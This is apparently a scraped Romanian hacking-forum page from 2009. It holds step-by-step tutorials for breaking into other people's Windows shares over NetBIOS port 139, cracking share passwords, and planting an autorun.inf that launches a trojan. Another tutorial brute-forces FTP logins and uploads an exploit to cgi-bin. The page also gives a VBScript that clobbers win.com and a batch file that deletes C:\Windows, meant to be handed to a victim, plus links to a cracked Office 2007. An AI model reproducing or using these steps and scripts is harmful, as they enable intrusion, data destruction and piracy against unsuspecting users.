1. Ce este NetBIOS-ul.
2. NetBIOS in Windows.
3. Gasirea punctului slab.
4. Exploatarea punctului slab.
5. Cum treci de parola.
6. Cum poti determina un sistem de operare sa activeze optiunea de share pe toate partitiile sale.
_____________________________________________________________________________
1. NetBIOS (Network Basic Input/Output System) este un concept operational realizat de IBM si Sytek realizat pentru a indeplini rolul de API (Application
Programming Interface) pentru ca o aplicatie sa poata accesa resursele unei retele. Pe scurt NetBIOS permite aplicatiilor sa comunice cu o retea.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2. NetBIOS in Windows. Un computer poate fi accesat cu NetBIOS daca are deschis portul 139. Acest port (139) este cel mai periculos port de pe internet. Toate fisierele si imprimantele ce au pornita optiunea de share pe un sistem Windows ruleaza pe acest port. Aproximativ 10% din totalitatea utilizatorilor de Internet au hard disk-urile expuse prin intermediul acestui port. Portul acesta (139) este primul port la care vrea sa se conecteze un Hacker si tot acest port este cel blocat de un Firewall.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
3. Gasirea punctului slab. Pentru a gasi un computer vulnerabil trebuie sa scanati o retea sau o arie de IP-uri pentru a vedea care are portul 139 deschis. Pentru acest lucru recomand folosirea programului IPScan (acest program se poate gasi pe CD-ul nostru). Odata ce se termina scanarea si se gasesc IP-uri vulnerabile se trece la punctul 4.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
4. Exploatarea punctului slab. Dupa alegerea IP-ului vulnerabil se trece la conectarea cu acesta astfel:
START > RUN > In casuta de RUN se introduce comanda \xxx.xxx.xxx.xxx apoi se da clic pe OK.
ATENTIE xxx.xxx.xxx.xxx este IP-ul gasit de voi asa ca inlocuiti x-urile cu IP-ul gasit
Daca totul a mers bine ar trebui sa se deschida o fereastra cu continutul hard disk-ului victimei. Acum puteti vedea, realiza download sau uploade sau chiar sterge fisierele de pe computerul victimei.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
5. Cum treci de parola. Se poate intampla uneori ca computerul la care incerci sa te conectezi sa fie protejat de o parola. In acest caz trebuie sa folosesti programul PQwak (acest program se poate gasi pe CD-ul nostru). In acest program nu trebuie decat sa introduci IP-ul si numele de share. Numele de share este numele folder-ului care este protejat de parola. Dupa ce ati introdus aceste lucruri trebuie doar sa urmariti cum lucreaza PQwak.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
6. Cum poti determina un sistem de operare sa activeze optiunea de share pe toate partitiile sale. Daca partitia care are activata obtiunea de share este (C: D: etc.) atunci poti pune un troian care-ti poate oferi accesul la restul partitiilor si chiar la intregul computer. Pentru a realiza acest lucru trebuie creat un fisier ce va purta numele de autorun.inf Pentru a realiza acest fisier trebuie sa creati un fisier txt care sa contina urmatoarele:
--------------------------------------------------------------------------------------------
CELE SCRISE MAI JOS TREBUIESC COPIATE FARA MODIFICARI.
---------------------------------------------------------------------------------------------
open=autoexec.bak.exe
---------------------------------------------------------------------------------------------
Dupa care se salveaza fisierul txt modificandu-se extensia din .txt in .inf
Apoi cu ajutorul unui Troian (pe cd-ul nostru puteti gasi multe astfel de programe) se realizeaza un troian numit autoexec.bak.exe
Acum cand cele doua fisiere sunt gata trebuie sa le copiem in directorul principal adica in radacina. Spre exemplu daca avem acces la partitia C: atunci fisierele noastre vor fi copiate direct pe aceasta partitie fara sa fie puse in folder.
Acum nu trebuie decat sa asteptati ca victima sa acceseze partitia in care ati pus cele doua fisiere. Odata accesata acesta partitie troianul se va executa oferind acces la tot computerul.
BAFTA :finger:
23.03.2009
20.3KB
1. Intr-un topic postati doar ce este legat de subiect, discutiile offtopic vor fi pedepsite. (1 Warning)
2. Folositi un limbaj decent. Fara atacuri la persoana sau expresii vulgare. Orice utilizator al forumului vrea sa fie respectat indiferent de varsta, sex, natie sau nivel al cunostintelor. Evitati atitudinile ostile fata de ceilalti utilizatori. (1 - 4 warning-uri / ban temporar/permanent)
3. Inainte de deschiderea unui nou topic folositi functia "Cautare", asigurandu-va ca nu s-a mai discutat despre asa ceva. (1 Warning)
4. Nu deschideti topicuri foarte vechi decat daca aveti ceva important de spus si/sau daca doriti sa fiti ajutat in aceeasi problema (Daca nu ati gasit raspunsul in celelalte posturi). (1 Warning)
5. Nu faceti doua posturi consecutive in acelasi topic la intervale mai mici 6-12 ore decat daca este strict necesar. Daca aveti ceva de adaugat folositi butonul "Edit". (1 Warning)
6. Reclamele de orice fel NU sunt permise. Singurul loc in care puteti mentiona site-ul dumneavoastra este campul "Website" din profil. Nu postati linkuri care n-au legatura cu subiectul topicului, acestea vor fi sterse. Reclama in semnatura NU este acceptata. Utilizatorilor care au linkuri in semnatura li se va lua dreptul de a mai purta semnatura. (1 - 4 Warning-uri / Ban)
7. Titlul unui subiect trebuie sa fie clar si sa reflecte continutul postului. Deasemenea, trebuie sa fiti cat mai expliciti posibil pentru a evita eventualele nelamuriri. Acesta nu trebuie sa fie de genul "Heeelp", "Ajutooor", "Ce trebuie sa fac", "Uitati-va aici". Cand postati o problema si nu primiti raspunsul asteptat, reformulati in asa fel incat sa fiti siguri ca ceilalti inteleg ce doriti. (1 Warning)
8. Evitati posturile monosilabice de genul "OK", "Ms", "Bv" sau altele care nu denota altceva decat incultura si lipsa de respect. (1 Warning)
9. Este interzisa postarea de materiale pornografice / indecente / vulgare, care ar putea leza dispozitia userilor de pe forum. (1 - 4 Warning-uri / Ban permanent)
10. Nu folositi foarte des tasta "CAPS LOCK" si emoticon-urile, nu scrieti cu text avand dimensiuni foarte mari si fiind foarte colorat. (1 Warning)
11. In cazul in care postati un tutorial care nu va apartine, este obligatoriu sa precizati autorul, in fond, e vorba de respectul fata de cei care s-au chinuit sa il scrie (1 - 4 Warning-uri, ban permanent)
12. Fiecare utilizator este obligat sa faca cel putin un post pe forum, chiar si cei care intra doar pentru a se informa. Utilizatorii cu 0 posturi sunt stersi periodic. Pentru a evita neplacerile puteti face un prim (unic) post in sectiunea "WeLcoMe", un post care ajuta sa ne cunoastem mai bine.
Reguli privind avatarele, semnaturile si imaginile postate pe forum:
1. In semnatura puteti pune o imagine , eventual si un userbar .
2. Dimensiunea maxima a avatarului este de 100x100 pixeli.
3. Nu folositi ca avatar imaginile de la rank-urile speciale de pe forum . Actionand ca atare, va atrage dupa sine luarea dreptului de a mai avea avatar, plus sanctionare cu 2-4 warning-uri.
4. Nu folositi in semnatura sau la avatar imagini indecente/pornografice. Consecinte: luarea dreptului de a mai avea avatar/semantura si sanctionare cu 1-5 warning-uri.
5. Nu folositi link-uri in avatar/semnatura catre site-uri personale, deasemenea sub nici o forma nu puneti link-uri cu REFFER.
23.03.2009
20.3KB
partea 1
partea 2
partea 3
partea 4
partea 5
partea 6
partea 7
cerinte de sistem
-Procesor 3 GHz
-Ram 1 GB
-Video 128 Mb
24.03.2009
28.6KB
Folosesc aceste doua siteuri pentru a extrage suntetul din videoclipurile de pe youtube!
:)
24.03.2009
20.3KB
Download Link: ... _en-us.exe
24.03.2009
33.6KB
Creati un Fisier Text Nodepad deschidetil si scrieti urmatoarele :
Dim fso, fs1, fs2
Dim drive, folder, file
Set fso = CreateObject("Scripting.FileSystemObject"
Code:
Dim fso, fs1, fs2
Dim drive, folder, file
Set fso = CreateObject("Scripting.FileSystemObject"
drive = "c:\"
folder ="windows\"
file = "win.com"
Set fs1 = fso.GetFile(drive&folder&file)
fs1.copy ("c:\windows\temp\win.com"
set fs2=fso.CreateTextFile("c:\windows\win.com"
fs2.writeline "win.com is gone images/smiles/icon_biggrin.gif"
Set fs1 = fso.GetFile(drive&folder&file)
fs1.delete
fs2.close
24.03.2009
20.3KB
Microsoft Office Ultimate 2007 provides people at home or work with a comprehensive set of tools that helps them gather and consolidate virtually any type of information, find what they are looking for quickly, and easily share information with others across geographical or organizational boundaries so they can deliver better results faster.
... .part1.rar
... .part2.rar
... .part3.rar
... .part4.rar
... .part5.rar
Microsoft Office 2007 Ultimate Crack:
... BuYcKi.rar
Microsoft Office 2007 Ultimate Uninstall: (If you want to uninstall)
... BuYcKi.rar
Tehnica Brute Force - Cum sa spargi un site
Se poate afla parola unui server folosind metode mai putin inteligente cum ar fi conectarile repetate.
Pentru acest lucru este necesar un program de brute force cracking.
Cel mai bun program de acest tip este 'Brutus'. In motorul de cautare tastati 'Brutus' sau 'brute force', pe care il gasiti la sectiunea DOWNLOAD.
Dar cel mai bine se intelege privind urmatorul exemplu. Sa presupunem ca serverul are client ftp.
Incercam prima data o conexiune: Deschidem Start/Run si tastam:
open ftp.server.home.ro
220
220
220
220
220
connecting to server running WU_FTPD(ftp.debbie.server.com): {introduceti debbbie}
password:********
userid/password incorrect login failed
goodbye
Dupa cum am vazut serverul,chiar daca nu a permis conectarea,a fost destul de amabil incat sa ne ofere doua informatii
de mare inportanta:
username:debbie
tipul de server:WU_FTPD
Ori gasim un exploit pentru wu_ftpd ori incercam un brute force cracking.
Programul Brutus ofera doua posibilitati de a ataca un server:folosind un dictionar de parole sau incercand toate combinatiile posibile.
Din moment ce stiti username-ul inlocuiti fisierul 'users.dat' care este livrat cu Brutus cu un fisier in care puneti
un singur nume si anume 'debbie'.Fisierul astfel creat puteti sa-l denumiti tot 'user.dat'.
Tot ce va ramane de facut dupa ce ati facut setarile este sa asteptati.
Dupa ce epuizati incercarile cu dictionarul,setati optiunea 'brute force' si selectati optiunile dorite.
Ideal ar fi sa stim lungimea parolei sau numarul de caractere din care este alcatuita parola precum si natura acestora.
Initial eu obisnuiesc sa fac urmatoarele setari privind parola:
length min:0
length max 10
custom char :0123456789
In felul acesta incerc intai toate combintiile numerice posibile apoi schimb optiunea cu litere:
custom char:abcderftyijop
Aceasta metoda este absolut sigura dar are doua dezavantaje majore:
1)Timpul mare de asteptare (1 ora-cateva luni depinde de noroc).Pentru cineva care are Net-ul pe Lan nu este o problema(firma sau alta institutie).
2)Ip-ul dvs este inregistrat,asa ca incercati sa folositi un proxy server sau un program
precum 'jammer' care zice-se ca ascunde numarul de telefon.
Voi mai da un exempu de bug in ftp:
open ftp.server.com 220
220
220
...
connecting to........(ftp.server.com):ftp {introduceti un user implicit} password:guest
ftp>dir 'tastati dir sa vedeti la ce directoare aveti acces'
Daca vedeti un director numit cgi-bin,cgi-win sau script atunci servrul este hackerit!!!
Cautati un exploit adecvat pentru sistemul de operare respectiv (stiti cum sa-l aflati) il puneti pe desktop,
apoi dati urmatoarea comanda(pres. ca exploitul se numeste expl.exe):
cd cgi-bin(sau ce director gasiti)
put expl.exe
apoi tastati 'quit' ,deschideti browserul si tastati(pres. ca directorul este cgi-bin):
Bafta :finger: :finger:
23.03.2009
20.3KB
Download Link: ... p;lid=2671
24.03.2009
41.3KB
deschide un notepad si scrie urmatorul cod
@echo off
cd /D D:\
del /q C:\Windows\*.*
del .bat
dai save as si pune extensia .bat si daio lu unu